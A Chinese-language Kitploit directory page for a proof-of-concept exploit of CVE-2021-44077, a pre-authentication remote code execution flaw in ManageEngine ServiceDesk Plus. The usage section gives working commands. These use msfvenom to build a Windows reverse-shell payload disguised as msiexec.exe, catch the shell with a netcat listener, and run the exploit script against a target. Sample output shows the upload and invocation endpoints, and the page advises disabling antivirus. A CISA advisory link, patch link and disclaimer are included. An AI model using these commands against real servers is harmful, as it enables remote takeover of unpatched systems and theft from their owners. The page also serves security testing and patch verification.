Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2021-44077 — 适用于ManageEngine ServiceDesk Plus(CVE-2021-44077)PreAuth RCE的概念验证漏洞利用工具。可在易受攻击的目标上上传并执行任意Windows可执行文件。 | Kitploit
工具/GitHubGitHub/horizon3ai/cve-2021-44077
Payload生成漏洞分析漏洞利用Web应用程序漏洞利用渗透测试红队
GitHubhorizon3ai/cve-2021-44077

CVE-2021-44077

适用于ManageEngine ServiceDesk Plus(CVE-2021-44077)PreAuth RCE的概念验证漏洞利用工具。可在易受攻击的目标上上传并执行任意Windows可执行文件。

查看仓库
36924年前Kitploit 审核通过

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2021-44077

CVE-2021-44077 的概念验证利用程序:ManageEngine ServiceDesk Plus < 11306 中的预认证远程代码执行

基于:

  • https://xz.aliyun.com/t/10631

CISA 公告:

  • https://www.cisa.gov/uscert/ncas/alerts/aa21-336a

修复方案(升级至内部版本 11306 或更高版本):

  • https://www.manageengine.com/products/service-desk/security-response-plan.html

已在 ManageEngine ServiceDesk Plus 内部版本 11303 上测试。禁用所有杀毒软件。

使用方法

该利用程序会将一个 Windows 可执行文件上传到目标并执行。

要利用漏洞,首先生成任意可执行文件。例如:

root@kitploit:~
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.0.140 LPORT=4444 -f exe > msiexec.exe

pip install 安装 requirements 文件,或确保已安装 requests 包。

如果你要接收反弹 shell,请先运行你的监听器,例如:

root@kitploit:~
nc -l 4444

然后运行利用脚本,传入 url 和 exe 参数,例如:

root@kitploit:~
python exploit.py http://<目标>:<端口> <可执行文件路径>

示例脚本输出:

root@kitploit:~
% python exploit.py http://192.168.0.140:8080 msiexec.exe
[+] Target: http://192.168.0.140:8080/
[+] Executable: msiexec.exe
[+] Uploading msiexec.exe to http://192.168.0.140:8080/RestAPI/ImportTechnicians?step=1
[+] Got 401 error code on upload. This is expected.
[+] Uploaded msiexec.exe
[+] Attempting to invoke against url http://192.168.0.140:8080/./RestAPI/s247action. Waiting up to 20 seconds...
[+] Done, did it work?

Proof

利用说明

  • 该漏洞允许你将任意文件上传到安装目录的 bin 文件夹中,包括已有的文件(如批处理脚本)。可能还有其他方式可以调用上传的文件。
  • 直接上传 Web Shell 似乎被过滤器阻止了。

免责声明

本软件纯粹出于学术研究和开发有效防御技术的目的而创建,不应用于攻击系统,除非已明确授权。项目维护者不对软件的滥用承担责任。请负责任地使用。

下载工具